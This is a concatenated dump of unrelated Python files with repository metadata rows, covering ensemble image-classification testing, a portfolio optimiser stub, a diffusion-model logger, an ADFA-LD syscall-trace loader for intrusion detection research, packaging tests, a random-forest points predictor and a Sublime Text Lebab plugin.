Data4stage2 = pd.DataFrame({'Name':filename_list, 'softmax_good':np.array(prediction_list_mean)[:,0],'softmax_usable':np.array(prediction_list_mean)[:,1],'softmax_bad':np.array(prediction_list_mean)[:,2], 'good_sd':np.array(prediction_list_std)[:,0],'usable_sd':np.array(prediction_list_std)[:,1],'bad_sd':np.array(prediction_list_std)[:,2], 'Prediction': prediction_decode_list})
Data4stage2.to_csv('./test_outside/results_ensemble.csv', index = None, encoding='utf8')
if not os.path.exists('../Results/M1'):
os.makedirs('../Results/M1')
Data4stage2.to_csv('../Results/M1/results_ensemble.csv', index = None, encoding='utf8')
def get_args():
parser = argparse.ArgumentParser(description='Train the UNet on images and target masks',
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('-e', '--epochs', metavar='E', type=int, default=240,
help='Number of epochs', dest='epochs')
parser.add_argument('-b', '--batch-size', metavar='B', type=int, nargs='?', default=6,
help='Batch size', dest='batchsize')
parser.add_argument('-f', '--train_on_dataset', dest='load', type=str, default=False,
help='Load model from a .pth file')
parser.add_argument( '-dir', '--test_csv_dir', metavar='tcd', type=str,
help='path to the csv', dest='test_dir')
parser.add_argument( '-n_class', '--n_classes', dest='n_class', type=int, default=False,
help='number of class')
parser.add_argument( '-d','--test_on_dataset', dest='dataset', type=str,
help='dataset name')
parser.add_argument( '-t', '--task_name', dest='task', type=str,
help='The task name')
parser.add_argument( '-r', '--round', dest='round', type=int,
help='Number of round')
parser.add_argument( '-m', '--model', dest='model', type=str,
help='Backbone of the model')
parser.add_argument('--seed_num', type=int, default=42, help='Validation split seed', dest='seed')
parser.add_argument('--local_rank', default=0, type=int)
return parser.parse_args()
if __name__ == '__main__':
logging.basicConfig(level=logging.INFO, format='%(levelname)s: %(message)s')
args = get_args()
torch.cuda.set_device(args.local_rank)
device = torch.device("cuda", args.local_rank)
#logging.info(f'Using device {device}')
test_dir = args.test_dir
dataset=args.dataset
img_size= (512,512)
if args.model=='inceptionv3':
model_fl = InceptionV3_fl(pretrained=True)
if args.model=='densenet161':
model_fl = Densenet161_fl(pretrained=True)
if args.model == 'resnet101':
model_fl = Resnet101_fl(pretrained=True)
if args.model == 'resnext101':
model_fl_1 = Resnext101_32x8d_fl(pretrained=True)
model_fl_2 = Resnext101_32x8d_fl(pretrained=True)
model_fl_3 = Resnext101_32x8d_fl(pretrained=True)
model_fl_4 = Resnext101_32x8d_fl(pretrained=True)
model_fl_5 = Resnext101_32x8d_fl(pretrained=True)
model_fl_6 = Resnext101_32x8d_fl(pretrained=True)
model_fl_7 = Resnext101_32x8d_fl(pretrained=True)
model_fl_8 = Resnext101_32x8d_fl(pretrained=True)
if args.model == 'efficientnet':
model_fl_1 = Efficientnet_fl(pretrained=True)
model_fl_2 = Efficientnet_fl(pretrained=True)
model_fl_3 = Efficientnet_fl(pretrained=True)
model_fl_4 = Efficientnet_fl(pretrained=True)
model_fl_5 = Efficientnet_fl(pretrained=True)
model_fl_6 = Efficientnet_fl(pretrained=True)
model_fl_7 = Efficientnet_fl(pretrained=True)
model_fl_8 = Efficientnet_fl(pretrained=True)
if args.model == 'mobilenetv2':
model_fl = MobilenetV2_fl(pretrained=True)
if args.model == 'vgg16bn':
model_fl = Vgg16_bn_fl(pretrained=True)
checkpoint_path_1 = './{}/{}/{}/7_seed_28/best_loss_checkpoint.pth'.format(args.task, args.load, args.model )
checkpoint_path_2 = './{}/{}/{}/6_seed_30/best_loss_checkpoint.pth'.format(args.task, args.load, args.model )
checkpoint_path_3 = './{}/{}/{}/5_seed_32/best_loss_checkpoint.pth'.format(args.task, args.load, args.model )
checkpoint_path_4 = './{}/{}/{}/4_seed_34/best_loss_checkpoint.pth'.format(args.task, args.load, args.model )
checkpoint_path_5 = './{}/{}/{}/3_seed_36/best_loss_checkpoint.pth'.format(args.task, args.load, args.model )
checkpoint_path_6 = './{}/{}/{}/2_seed_38/best_loss_checkpoint.pth'.format(args.task, args.load, args.model )
checkpoint_path_7 = './{}/{}/{}/1_seed_40/best_loss_checkpoint.pth'.format(args.task, args.load, args.model )
checkpoint_path_8 = './{}/{}/{}/0_seed_42/best_loss_checkpoint.pth'.format(args.task, args.load, args.model )
model_fl_1.to(device=device)
model_fl_2.to(device=device)
model_fl_3.to(device=device)
model_fl_4.to(device=device)
model_fl_5.to(device=device)
model_fl_6.to(device=device)
model_fl_7.to(device=device)
model_fl_8.to(device=device)
map_location = {'cuda:%d' % 0: 'cuda:%d' % args.local_rank}
if args.load:
model_fl_1.load_state_dict(
torch.load(checkpoint_path_1, map_location="cuda:0")
)
model_fl_2.load_state_dict(
torch.load(checkpoint_path_2, map_location="cuda:0")
)
model_fl_3.load_state_dict(
torch.load(checkpoint_path_3, map_location="cuda:0")
)
model_fl_4.load_state_dict(
torch.load(checkpoint_path_4, map_location="cuda:0")
)
model_fl_5.load_state_dict(
torch.load(checkpoint_path_5, map_location="cuda:0")
)
model_fl_6.load_state_dict(
torch.load(checkpoint_path_6, map_location="cuda:0")
)
model_fl_7.load_state_dict(
torch.load(checkpoint_path_7, map_location="cuda:0")
)
model_fl_8.load_state_dict(
torch.load(checkpoint_path_8, map_location="cuda:0")
)
# faster convolutions, but more memory
# cudnn.benchmark = True
try:
test_net(model_fl_1,
model_fl_2,
model_fl_3,
model_fl_4,
model_fl_5,
model_fl_6,
model_fl_7,
model_fl_8,
test_dir,
device=device,
epochs=args.epochs,
batch_size=args.batchsize,
image_size=img_size)
except KeyboardInterrupt:
torch.save(model_fl.state_dict(), 'INTERRUPTED.pth')
logging.info('Saved interrupt')
try:
sys.exit(0)
except SystemExit:
os._exit(0)
| 7,993 | 0 | 46 |
b90f7db21c8d8c225c6f1cad8ec1625177bb1306 | 128 | py | Python | app/googlesearch.py | logoogol/docker-blog | 57c1615b88474dd1e96fb6b4fb4311d7fd6b1e5f | [
"Unlicense"
] | null | null | null | app/googlesearch.py | logoogol/docker-blog | 57c1615b88474dd1e96fb6b4fb4311d7fd6b1e5f | [
"Unlicense"
] | null | null | null | app/googlesearch.py | logoogol/docker-blog | 57c1615b88474dd1e96fb6b4fb4311d7fd6b1e5f | [
"Unlicense"
] | null | null | null | from googlesearch import search
query = "fastapi"
for i in search(query, tld="co.in", num=10, stop=10, pause=2):
print(i) | 21.333333 | 62 | 0.679688 | from googlesearch import search
query = "fastapi"
for i in search(query, tld="co.in", num=10, stop=10, pause=2):
print(i) | 0 | 0 | 0 |
1b70ce2758a4f45779a3bc09fae2ec3f214f03e2 | 1,403 | py | Python | python/primary_implementation_case_1111.py | MichaelWehar/BooleanMatrixRectangleProblem | fb59e80d9c6b2d0d1137a9df38274648eee3c79e | [
"MIT"
] | 6 | 2020-06-17T21:56:28.000Z | 2021-12-17T18:15:51.000Z | python/primary_implementation_case_1111.py | MichaelWehar/BooleanMatrixRectangleProblem | fb59e80d9c6b2d0d1137a9df38274648eee3c79e | [
"MIT"
] | 3 | 2019-05-24T00:03:45.000Z | 2020-06-11T07:23:36.000Z | python/primary_implementation_case_1111.py | MichaelWehar/BooleanMatrixRectangleProblem | fb59e80d9c6b2d0d1137a9df38274648eee3c79e | [
"MIT"
] | 1 | 2020-06-17T21:57:57.000Z | 2020-06-17T21:57:57.000Z | # Created on 5/21/20
# Author: Ari Liloia and Michael Wehar
| 45.258065 | 95 | 0.595866 | # Created on 5/21/20
# Author: Ari Liloia and Michael Wehar
def rectExists(m, n, matrix):
# This set will store pairs of column indexes
columnPairs = set()
# Traverse through the matrix row by row
for i in range(m):
currentRow = []
# Traverse through current row's elements to find all 1's (or true entries)
for j in range(n):
if matrix[i][j] == True:
currentRow.append(j)
# Efficiently traverse through pairs of column indexes with 1's (or true entries)
# First, iterate over all possible entries containing 1 (or true)
numberOfOnes = len(currentRow)
for firstIndex in range(numberOfOnes - 1):
firstElement = currentRow[firstIndex]
# Next, iterate over all possible next entries containing 1 (or true)
for nextIndex in range(firstIndex + 1, numberOfOnes):
nextElement = currentRow[nextIndex]
# print((firstElement * n) + nextElement)
# Encode a pair (firstElement, nextElement) as (firstElement * n) + nextElement
currentPair = (firstElement * n) + nextElement
if(currentPair in columnPairs):
# print(str(firstElement) + " " + str(nextElement))
return True
else:
columnPairs.add(currentPair)
return False
| 1,320 | 0 | 23 |
70b6edf1d7ed5c850c6fa6c6f71b89b1b6eca662 | 1,026 | py | Python | mshtensorflow/utilities.py | adhamhesham97/Deep-Learning-framework | 7904b993fd7c45f4c0b7fbe028eacd3ce2773d7f | [
"MIT"
] | null | null | null | mshtensorflow/utilities.py | adhamhesham97/Deep-Learning-framework | 7904b993fd7c45f4c0b7fbe028eacd3ce2773d7f | [
"MIT"
] | 1 | 2021-02-05T07:58:20.000Z | 2021-02-05T07:58:20.000Z | mshtensorflow/utilities.py | adhamhesham97/Deep-Learning-framework | 7904b993fd7c45f4c0b7fbe028eacd3ce2773d7f | [
"MIT"
] | 2 | 2021-01-25T14:50:14.000Z | 2021-05-24T22:07:12.000Z | # -*- coding: utf-8 -*-
"""
Created on Sun Jan 17 04:01:48 2021
@author: Adham
"""
from .Model import model
import numpy as np
import pickle | 25.65 | 54 | 0.568226 | # -*- coding: utf-8 -*-
"""
Created on Sun Jan 17 04:01:48 2021
@author: Adham
"""
from .Model import model
import numpy as np
import pickle
def hot_one(labels, num_classes):
num_of_examples = labels.shape[0]
hot_one = np.zeros((num_classes, num_of_examples))
for i in range(num_of_examples):
hot_one [int(labels[i])] [i] = 1
return hot_one
def store(Model, filename):
if not filename.endswith(".dat"):
filename+=".dat"
with open('models\\'+filename, "wb") as f:
pickle.dump(Model.getParams(), f)
def load(filename):
Model = model()
if not filename.endswith(".dat"):
filename+=".dat"
try:
with open('models\\'+filename,"rb") as f:
layers = pickle.load(f)
Model.setParams(layers)
except:
try:
with open(filename,"rb") as f:
layers = pickle.load(f)
Model.setParams(layers)
except:
print ("file not found")
return Model | 815 | 0 | 69 |
92bd0a2d6dc3498cd87834e41655cd486ff86538 | 1,334 | py | Python | src/modules/stepwise_log.py | ArturPrzybysz/ProbabilisticDeepDiffusionModels | 3056d8da25107aeeb122106e63958bb3fc62d7a4 | [
"MIT"
] | null | null | null | src/modules/stepwise_log.py | ArturPrzybysz/ProbabilisticDeepDiffusionModels | 3056d8da25107aeeb122106e63958bb3fc62d7a4 | [
"MIT"
] | null | null | null | src/modules/stepwise_log.py | ArturPrzybysz/ProbabilisticDeepDiffusionModels | 3056d8da25107aeeb122106e63958bb3fc62d7a4 | [
"MIT"
] | null | null | null | import numpy as np
| 35.105263 | 84 | 0.614693 | import numpy as np
class StepwiseLog:
def __init__(self, diffusion_steps, max_keep=None):
self.diffusion_steps = diffusion_steps
self.max_keep = max_keep
self.reset()
def reset(self):
self.metric_per_t = {t: [] for t in range(1, self.diffusion_steps + 1)}
self.avg_per_step = np.zeros(self.diffusion_steps)
self.avg_sq_per_step = np.zeros(self.diffusion_steps)
self.n_per_step = np.zeros(self.diffusion_steps)
def update(self, t, metric):
if np.isfinite(metric):
self.metric_per_t[t].append(metric)
if self.max_keep is not None and len(self.metric_per_t) > self.max_keep:
self.metric_per_t[t] = self.metric_per_t[t][-self.max_keep :]
self.avg_per_step[t - 1] = np.mean(self.metric_per_t[t])
self.avg_sq_per_step[t - 1] = np.sqrt(
np.mean(np.power(self.metric_per_t[t], 2))
)
self.n_per_step[t - 1] += 1
def update_multiple(self, ts, metrics):
for t, m in zip(ts, metrics):
self.update(t, m)
def get_avg_in_range(self, t0, t1):
# TODO: averaging within steps??
return np.concatenate([self.metric_per_t[t] for t in range(t0, t1)]).mean()
def __getitem__(self, t):
return self.metric_per_t[t]
| 1,133 | -3 | 184 |
7a1e62a32c2100b9e0e9ce8499a978935b09eb5e | 1,034 | py | Python | src/model.py | vilelabruno/MarcowitzPortfolioOPT | 54086d5004b5b05f811732efe229931f3af0a6fa | [
"MIT"
] | 2 | 2020-03-09T14:39:50.000Z | 2020-03-10T12:48:25.000Z | src/model.py | vilelabruno/MarkowitzPortfolioOPT | 54086d5004b5b05f811732efe229931f3af0a6fa | [
"MIT"
] | null | null | null | src/model.py | vilelabruno/MarkowitzPortfolioOPT | 54086d5004b5b05f811732efe229931f3af0a6fa | [
"MIT"
] | null | null | null | from pulp import *
if __name__ == "main":
main() | 34.466667 | 75 | 0.569632 | from pulp import *
def main():
x = LpVariable('x')
w_vars = []
problem = LpProblem('portfolio_theory', LpMaximize)
for i in range(v.shape[0]):
w_i = LpVariable('w_' + str(i), 0, 1)
w_vars.append(w_i)
for vector in vv_set.set:
diff_list = []
for index, _ in enumerate(vector):
diff = v[index] - vector[index]
diff_list.append(w_vars[index] * diff)
problem += reduce(operator.add, diff_list, -x) >= 0
problem += reduce(operator.add, w_vars, 0) == 1
problem += x #What to optimise, i.e., x
status = problem.solve()
if value(x) <= 0:
if(len(vv_set.set)==0):
#Special case: in this case x is not in the problem and
#any solution in the weight simplex goes. Therefore, x retained
#its initial value of 0
return np.array([value(w) for w in w_vars]), True
return [], False
else:
return np.array([value(w) for w in w_vars]), True
if __name__ == "main":
main() | 957 | 0 | 24 |
05914362d55bdb70b02c058cc14030c673112fc3 | 3,713 | py | Python | bento/core/tests/test_package.py | abadger/Bento | 3f1ddefd8d21decbc018d097d3ec5da4dc9364df | [
"BSD-3-Clause"
] | 1 | 2015-10-25T13:08:36.000Z | 2015-10-25T13:08:36.000Z | bento/core/tests/test_package.py | abadger/Bento | 3f1ddefd8d21decbc018d097d3ec5da4dc9364df | [
"BSD-3-Clause"
] | null | null | null | bento/core/tests/test_package.py | abadger/Bento | 3f1ddefd8d21decbc018d097d3ec5da4dc9364df | [
"BSD-3-Clause"
] | null | null | null | import unittest
import os
import tempfile
from nose.tools import \
assert_equal
from bento import PackageDescription
from bento.core.package import file_list, static_representation
from bento.core.meta import PackageMetadata
from bento.core.pkg_objects import DataFiles
from bento.core.node import Node
| 32.286957 | 88 | 0.601939 | import unittest
import os
import tempfile
from nose.tools import \
assert_equal
from bento import PackageDescription
from bento.core.package import file_list, static_representation
from bento.core.meta import PackageMetadata
from bento.core.pkg_objects import DataFiles
from bento.core.node import Node
def create_file(file, makedirs=True):
if makedirs:
dirname = os.path.dirname(file)
if not os.path.exists(dirname):
os.makedirs(dirname)
fid = open(file, "w").close()
def clean_tree(files):
dirs = []
for f in files:
dirs.append(os.path.dirname(f))
if os.path.exists(f):
os.remove(f)
for d in sorted(set(dirs))[::-1]:
os.rmdir(d)
class TestPackage(unittest.TestCase):
def test_file_list(self):
# Create a simple package in temp dir, and check file_list(pkg) is what
# we expect
_files = [
os.path.join("pkg", "__init__.py"),
os.path.join("pkg", "yo.py"),
os.path.join("module.py"),
os.path.join("data", "foo.dat"),
]
d = tempfile.mkdtemp()
root = Node("", None)
top_node = root.find_dir(d)
files = [os.path.join(d, "foo", f) for f in _files]
try:
for f in files:
create_file(f)
pkg = PackageDescription(name="foo",
packages=["pkg"],
py_modules=["module"],
data_files={"data":
DataFiles("data", files=["data/foo.dat"],
target_dir="$prefix",
source_dir=".")
})
fl = [os.path.normpath(f) for f in file_list(pkg, top_node.find_dir("foo"))]
assert_equal(sorted(fl), sorted(_files))
finally:
clean_tree(files)
os.rmdir(d)
class TestStaticRepresentation(unittest.TestCase):
def test_metadata(self):
bento_info = """\
Name: Sphinx
Version: 0.6.3
Summary: Python documentation generator
Url: http://sphinx.pocoo.org/
DownloadUrl: http://pypi.python.org/pypi/Sphinx
Description: Some long description.
Author: Georg Brandl
AuthorEmail: georg@python.org
Maintainer: Georg Brandl
MaintainerEmail: georg@python.org
License: BSD
Platforms: any
Classifiers:
Development Status :: 4 - Beta,
Environment :: Console,
Environment :: Web Environment,
Intended Audience :: Developers,
License :: OSI Approved :: BSD License,
Operating System :: OS Independent,
Programming Language :: Python,
Topic :: Documentation,
Topic :: Utilities
"""
self._static_representation(bento_info)
def test_simple_library(self):
bento_info = """\
Name: foo
Library:
Packages: foo
"""
self._static_representation(bento_info)
def _static_representation(self, bento_info):
r_pkg = PackageDescription.from_string(bento_info)
# We recompute pkg to avoid dealing with stylistic difference between
# original and static_representation
pkg = PackageDescription.from_string(static_representation(r_pkg))
assert_equal(static_representation(pkg), static_representation(r_pkg))
class TestPackageMetadata(unittest.TestCase):
def test_ctor(self):
meta = PackageMetadata(name="foo", version="1.0", author="John Doe",
author_email="john@doe.com")
assert_equal(meta.fullname, "foo-1.0")
assert_equal(meta.contact, "John Doe")
assert_equal(meta.contact_email, "john@doe.com")
| 3,088 | 69 | 247 |
63b3b97ccf4be9b5fc60a99d9e914cc8ddfdc44a | 3,016 | py | Python | Season_Data/RandomForest.py | mattyopl/FPL_ML | c39dbd2370860f0e31ccdd8950518f7042853ba1 | [
"MIT"
] | null | null | null | Season_Data/RandomForest.py | mattyopl/FPL_ML | c39dbd2370860f0e31ccdd8950518f7042853ba1 | [
"MIT"
] | null | null | null | Season_Data/RandomForest.py | mattyopl/FPL_ML | c39dbd2370860f0e31ccdd8950518f7042853ba1 | [
"MIT"
] | null | null | null | import pandas as pd
import math
from sklearn.ensemble import RandomForestRegressor
trainInput = pd.read_excel("FPL_Season_Data_Only_Inputs_Shuffled2.xlsx")
trainInput = trainInput.drop(trainInput.columns[0], axis=1)
trainOutput = pd.read_excel("FPL_Season_Data_Only_Outputs_Shuffled2.xlsx")
trainOutput = trainOutput.pop("Points")
position = pd.get_dummies(trainInput["Position"],prefix="Position")
trainInput = pd.concat([position,trainInput], axis =1)
trainInput.drop(["Position"], axis=1, inplace=True)
trainInput.drop(["YC"], axis=1, inplace=True)
trainInput.drop(["RC"], axis=1, inplace=True)
trainInput.drop(["Bonus Points"], axis=1, inplace=True)
df = pd.read_excel("PredictionsData.xlsx")
position = pd.get_dummies(df["Position"],prefix="Position")
df = pd.concat([position,df], axis =1)
df.drop(["Position"], axis=1, inplace=True)
df.drop(["YC"], axis=1, inplace=True)
df.drop(["RC"], axis=1, inplace=True)
df.drop(["Bonus Points"], axis=1, inplace=True)
names = df.pop("Name")
regressor = RandomForestRegressor(n_estimators = 10000, random_state=30)
regressor.fit(trainInput,trainOutput)
predictions = regressor.predict(df)
predictionsDF = pd.DataFrame(predictions, columns=["Points"])
predictionsDF = pd.concat([names, predictionsDF],axis=1)
predictionsDF.sort_values("Points",ascending=False, inplace=True)
predictionsDF.to_excel("PredictionsRF10k.xlsx")
# import numpy as np
# import tensorflow as tf
# import pandas as pd
# import wandb
# from wandb.keras import WandbCallback
# #initializing
# np.set_printoptions(precision=4, suppress=True)
# wandb.init(project="RandomForest", entity="matthewlchen",sync_tensorboard=True)
# #pulling data
# trainInput = pd.read_excel("FPL_Season_Data_Only_Inputs_Shuffled2.xlsx")
# trainInput = trainInput.drop(trainInput.columns[0], axis=1)
# trainOutput = pd.read_excel("FPL_Season_Data_Only_Outputs_Shuffled2.xlsx")
# trainOutput = trainOutput.pop("Points")
# #transforming categorical position data into one hot encoding
# position = pd.get_dummies(trainInput["Position"],prefix="Position")
# trainInput = pd.concat([position,trainInput], axis =1)
# trainInput.drop(["Position"], axis=1, inplace=True)
# #converting dataframes to numpy arrays
# inputNP = np.asarray(trainInput)
# outputNP = np.asarray(trainOutput)
# #train/test split
# #inpTrain, inpTest, outTrain, outTest = train_test_split(inputNP, outputNP, test_size=0.20)
# #define model
# ##parameters - tuning still in process
# nEpochs = 100
# batch = 32
# model =
# model.compile(
# optimizer="adam",
# loss = "mean_squared_error",
# metrics = ["accuracy"]
# )
# wandb.config = {
# "learning_rate": 0.001,
# "epochs": nEpochs,
# "batch_size": batch
# }
# #run
# model.fit(inputNP,outputNP,batch_size=batch, validation_split=0.20,verbose=2,epochs=nEpochs, callbacks=[WandbCallback()])
# #model.save_weights("weights")
# #print(model.evaluate(inpTest, outTest, verbose=2)) | 33.142857 | 124 | 0.726459 | import pandas as pd
import math
from sklearn.ensemble import RandomForestRegressor
trainInput = pd.read_excel("FPL_Season_Data_Only_Inputs_Shuffled2.xlsx")
trainInput = trainInput.drop(trainInput.columns[0], axis=1)
trainOutput = pd.read_excel("FPL_Season_Data_Only_Outputs_Shuffled2.xlsx")
trainOutput = trainOutput.pop("Points")
position = pd.get_dummies(trainInput["Position"],prefix="Position")
trainInput = pd.concat([position,trainInput], axis =1)
trainInput.drop(["Position"], axis=1, inplace=True)
trainInput.drop(["YC"], axis=1, inplace=True)
trainInput.drop(["RC"], axis=1, inplace=True)
trainInput.drop(["Bonus Points"], axis=1, inplace=True)
df = pd.read_excel("PredictionsData.xlsx")
position = pd.get_dummies(df["Position"],prefix="Position")
df = pd.concat([position,df], axis =1)
df.drop(["Position"], axis=1, inplace=True)
df.drop(["YC"], axis=1, inplace=True)
df.drop(["RC"], axis=1, inplace=True)
df.drop(["Bonus Points"], axis=1, inplace=True)
names = df.pop("Name")
regressor = RandomForestRegressor(n_estimators = 10000, random_state=30)
regressor.fit(trainInput,trainOutput)
predictions = regressor.predict(df)
predictionsDF = pd.DataFrame(predictions, columns=["Points"])
predictionsDF = pd.concat([names, predictionsDF],axis=1)
predictionsDF.sort_values("Points",ascending=False, inplace=True)
predictionsDF.to_excel("PredictionsRF10k.xlsx")
# import numpy as np
# import tensorflow as tf
# import pandas as pd
# import wandb
# from wandb.keras import WandbCallback
# #initializing
# np.set_printoptions(precision=4, suppress=True)
# wandb.init(project="RandomForest", entity="matthewlchen",sync_tensorboard=True)
# #pulling data
# trainInput = pd.read_excel("FPL_Season_Data_Only_Inputs_Shuffled2.xlsx")
# trainInput = trainInput.drop(trainInput.columns[0], axis=1)
# trainOutput = pd.read_excel("FPL_Season_Data_Only_Outputs_Shuffled2.xlsx")
# trainOutput = trainOutput.pop("Points")
# #transforming categorical position data into one hot encoding
# position = pd.get_dummies(trainInput["Position"],prefix="Position")
# trainInput = pd.concat([position,trainInput], axis =1)
# trainInput.drop(["Position"], axis=1, inplace=True)
# #converting dataframes to numpy arrays
# inputNP = np.asarray(trainInput)
# outputNP = np.asarray(trainOutput)
# #train/test split
# #inpTrain, inpTest, outTrain, outTest = train_test_split(inputNP, outputNP, test_size=0.20)
# #define model
# ##parameters - tuning still in process
# nEpochs = 100
# batch = 32
# model =
# model.compile(
# optimizer="adam",
# loss = "mean_squared_error",
# metrics = ["accuracy"]
# )
# wandb.config = {
# "learning_rate": 0.001,
# "epochs": nEpochs,
# "batch_size": batch
# }
# #run
# model.fit(inputNP,outputNP,batch_size=batch, validation_split=0.20,verbose=2,epochs=nEpochs, callbacks=[WandbCallback()])
# #model.save_weights("weights")
# #print(model.evaluate(inpTest, outTest, verbose=2)) | 0 | 0 | 0 |
338d5c5eac8fc90fd690b66c2251645f25f8ea2a | 2,269 | py | Python | load_helper.py | Alger-Z/ContainerEscapeDetection | c42357e301dd291e0250768ac8c0922207c71a96 | [
"Apache-2.0"
] | null | null | null | load_helper.py | Alger-Z/ContainerEscapeDetection | c42357e301dd291e0250768ac8c0922207c71a96 | [
"Apache-2.0"
] | null | null | null | load_helper.py | Alger-Z/ContainerEscapeDetection | c42357e301dd291e0250768ac8c0922207c71a96 | [
"Apache-2.0"
] | null | null | null | import re
import os
from numpy.lib.function_base import insert
from utils import *
if __name__ =='__main__':
pass
#load_adfa_Attack_files("./ADFA-LD/Attack_Data_Master/")
| 25.494382 | 81 | 0.577347 | import re
import os
from numpy.lib.function_base import insert
from utils import *
def load_one_flle(filename):
x = []
with open(filename) as f:
line = f.readline()
x = line.strip('\n').split()
return x
def load_adfa_training_files(rootdir):
x = []
y = []
list = os.listdir(rootdir)
for i in range(0, len(list)):
path = os.path.join(rootdir, list[i])
if os.path.isfile(path):
x.append(load_one_flle(path))
y.append(0)
return x, y
def load_training_files(rootdir):
x = []
y = []
list = os.listdir(rootdir)
for i in range(0, len(list)):
path = os.path.join(rootdir, list[i])
if os.path.isfile(path):
x.append(load_one_flle(path))
y.append(0)
return x, y
def load_escp_files(rootdir):
x = []
y = []
list = os.listdir(rootdir)
for i in range(0, len(list)):
path = os.path.join(rootdir, list[i])
if os.path.isfile(path):
x.append(load_one_flle(path))
y.append(0)
return x, y
def dirlist(path, allfile):
filelist = os.listdir(path)
for filename in filelist:
filepath = os.path.join(path, filename)
if os.path.isdir(filepath):
dirlist(filepath, allfile)
else:
allfile.append(filepath)
return allfile
def load_adfa_webshell_files(rootdir):
x = []
y = []
allfile=dirlist(rootdir,[])
for file in allfile:
if re.match(r"\./ADFA-LD/Attack_Data_Master/Web_Shell_\d+/UAD-W*", file):
x.append(load_one_flle(file))
y.append(1)
return x, y
def load_adfa_Adduser_files(rootdir):
x = []
y = []
allfile=dirlist(rootdir,[])
for file in allfile:
if re.match(r"\./ADFA-LD/Attack_Data_Master/Adduser_\d+/UAD-W*", file):
x.append(load_one_flle(file))
y.append(1)
return x, y
def load_adfa_Attack_files(rootdir):
x = []
y = []
allfile=dirlist(rootdir,[])
for file in allfile:
if re.match(r".*txt$", file):
x.append(load_one_flle(file))
y.append(1)
return x, y
if __name__ =='__main__':
pass
#load_adfa_Attack_files("./ADFA-LD/Attack_Data_Master/")
| 1,901 | 0 | 182 |
b68228d5f4415656679f5941afc1efdf19942bde | 3,455 | py | Python | lebab.py | edasque/sublime-lebab | a2a3ac0d207650b89aa55d9500f905fc19340178 | [
"MIT"
] | 3 | 2016-07-29T02:53:26.000Z | 2017-04-24T01:17:12.000Z | lebab.py | edasque/sublime-lebab | a2a3ac0d207650b89aa55d9500f905fc19340178 | [
"MIT"
] | 2 | 2016-07-29T02:58:37.000Z | 2016-07-29T12:36:53.000Z | lebab.py | edasque/sublime-lebab | a2a3ac0d207650b89aa55d9500f905fc19340178 | [
"MIT"
] | null | null | null | import sublime, sublime_plugin
import json
import os
import platform
import subprocess
if platform.system() == 'Darwin':
os_name = 'osx'
elif platform.system() == 'Windows':
os_name = 'windows'
else:
os_name = 'linux'
# /usr/local/lib/node_modules/lebab/bin/index.js
BIN_PATH = os.path.join(
sublime.packages_path(),
os.path.dirname(os.path.realpath(__file__)),
'lebab-transform.js'
)
| 31.697248 | 92 | 0.586397 | import sublime, sublime_plugin
import json
import os
import platform
import subprocess
if platform.system() == 'Darwin':
os_name = 'osx'
elif platform.system() == 'Windows':
os_name = 'windows'
else:
os_name = 'linux'
# /usr/local/lib/node_modules/lebab/bin/index.js
BIN_PATH = os.path.join(
sublime.packages_path(),
os.path.dirname(os.path.realpath(__file__)),
'lebab-transform.js'
)
class LebabCommand(sublime_plugin.TextCommand):
def description():
return "Description works"
def run(self, edit):
print("BIN_PATH:",BIN_PATH)
selected_text = self.get_text()
code = self.lebabify(selected_text)
print("Code:\n"+code)
if code:
w = sublime.Window.new_file(self.view.window())
w.settings().set('default_extension', 'js')
w.set_syntax_file(self.view.settings().get('syntax'))
w.set_scratch(True)
w.insert(edit, 0, code)
else:
print("Lebab: No code returned")
def get_text(self):
if not self.has_selection():
region = sublime.Region(0, self.view.size())
return self.view.substr(region)
selected_text = ''
for region in self.view.sel():
selected_text = selected_text + self.view.substr(region) + '\n'
return selected_text
def has_selection(self):
for sel in self.view.sel():
if sel.a != sel.b:
return True
return False
def get_setting(self, key):
settings = self.view.settings().get('Babel')
if settings is None:
settings = sublime.load_settings('Babel.sublime-settings')
return settings.get(key)
def get_setting_by_os(self, key):
setting = self.get_setting(key)
if setting:
return setting.get(os_name)
def lebabify(self, data):
try:
return node_bridge(data, BIN_PATH, [json.dumps({
# from sublime
'filename': self.view.file_name(),
'newline_at_eof': self.view.settings().get('ensure_newline_at_eof_on_save'),
# from babel-sublime settings
'debug': True, # self.get_setting('debug'),
'use_local_babel': self.get_setting('use_local_babel'),
'node_modules': self.get_setting_by_os('node_modules'),
'options': self.get_setting('options')
})])
except Exception as e:
return str(e)
def node_bridge(data, bin, args=[]):
env = os.environ.copy()
startupinfo = None
if os_name == 'osx':
# GUI apps in OS X don't contain .bashrc/.zshrc set paths
env['PATH'] += ':/usr/local/bin'
elif os_name == 'windows':
startupinfo = subprocess.STARTUPINFO()
startupinfo.dwFlags |= subprocess.STARTF_USESHOWWINDOW
try:
p = subprocess.Popen(
['node', bin] + args,
stdout=subprocess.PIPE,
stdin=subprocess.PIPE,
stderr=subprocess.PIPE,
env=env,
startupinfo=startupinfo
)
except OSError:
raise Exception('Error: Couldn\'t find "node" in "%s"' % env['PATH'])
stdout, stderr = p.communicate(input=data.encode('utf-8'))
stdout = stdout.decode('utf-8')
stderr = stderr.decode('utf-8')
if stderr:
raise Exception('Error: %s' % stderr)
else:
return stdout
| 2,783 | 26 | 233 |
cbe337a29dd71a50920d6cfe3e1874dc9b6aa136 | 2,063 | py | Python | setup.py | michhar/chantilly | 6a8e4c3605a830c952d1cc8fd6405e5b4c104633 | [
"BSD-3-Clause"
] | 43 | 2019-10-03T12:30:38.000Z | 2020-11-11T10:43:51.000Z | setup.py | michhar/chantilly | 6a8e4c3605a830c952d1cc8fd6405e5b4c104633 | [
"BSD-3-Clause"
] | 16 | 2020-03-20T15:27:06.000Z | 2020-10-07T21:04:07.000Z | setup.py | michhar/chantilly | 6a8e4c3605a830c952d1cc8fd6405e5b4c104633 | [
"BSD-3-Clause"
] | 4 | 2020-04-26T00:06:39.000Z | 2020-11-11T11:44:22.000Z | import io
import os
from setuptools import find_packages, setup
here = os.path.abspath(os.path.dirname(__file__))
# Package meta-data.
NAME = 'chantilly'
DESCRIPTION = 'Deployment tool for online machine learning models'
LONG_DESCRIPTION_CONTENT_TYPE = 'text/markdown'
URL = 'https://github.com/creme-ml/chantilly'
EMAIL = 'maxhalford25@gmail.com'
AUTHOR = 'Max Halford'
REQUIRES_PYTHON = '>=3.7.0'
# Import the README and use it as the long-description.
with io.open(os.path.join(here, 'README.md'), encoding='utf-8') as f:
long_description = '\n' + f.read()
# Load the package's __version__.py module as a dictionary.
about = {}
